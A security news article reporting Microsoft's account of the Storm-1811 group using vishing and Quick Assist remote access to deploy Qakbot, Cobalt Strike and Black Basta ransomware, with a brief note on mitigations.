Hackers often target remote assist tools because they create a direct channel to access desired systems with minimum effort.
These tools have been built for remote control and access purposes, which makes them very appealing targets for attackers looking to hack networks or take over specific devices.
Microsoft observed the Storm-1811 group using Quick Assist for social engineering attacks that deploy Black Basta ransomware.
The attacks begin with vishing, exploiting Quick Assist’s remote access for initial compromise, and then delivering malware like:-
Microsoft is improving Quick Assist warnings against tech support scams while detections block malicious activity. Blocking unused remote tools and user education on recognizing scams can reduce risk.
Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers
Threat actors involved in threat activities impersonate IT support to undertake vishing attacks and trick target persons into giving them Quick Assist remote access.
They usually do this by pretending to fix a problem or offering spam help as a response to email flooding.
While on the call, Microsoft said they got the victim to initiate Quick Assist, enter the given code, enable screen sharing, and grant control access, consequently fully compromising the device.
Control is taken over through Quick Assist during which scripts are run to download malicious payloads that sometimes pretend to be spam filter updates in order to harvest credentials.
Some of the observed payloads included Qakbot and remote management tools such as ScreenConnect and Cobalt Strike, which finally led to the deployment of Black Basta ransomware by the Storm-1811 group using their access from Qakbot and Cobalt Strike.
After initial access, the attackers use ScreenConnect for persistence and lateral movement, NetSupport Manager for remote control, and OpenSSH tunneling.
They perform domain enumeration and use PsExec to deploy Black Basta ransomware received from the Qakbot and Cobalt Strike access by Storm-1811.
Black Basta is closed ransomware distributed by a few actors. Relying on initial access brokers while focusing on pre-ransomware stages reduces the threat impact.
Here below we have mentioned all the recommendations:-
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free
In a sweeping directive aimed at streamlining the Department of Homeland Security (DHS) operations, Acting…
The much-anticipated Pwn2Own Automotive 2025 kicked off today at Tokyo Big Sight, showcasing the cutting…
A critical security flaw in Windows File Explorer, identified as CVE-2024-38100, has been actively exploited,…
Over 1,000 malicious domains have been identified that impersonate popular platforms like Reddit and WeTransfer…
A new ransomware threat dubbed "Helldown" has emerged, actively exploiting vulnerabilities in Zyxel firewall devices…
A former CIA analyst, Asif William Rahman, 34, pleaded guilty today to unlawfully retaining and…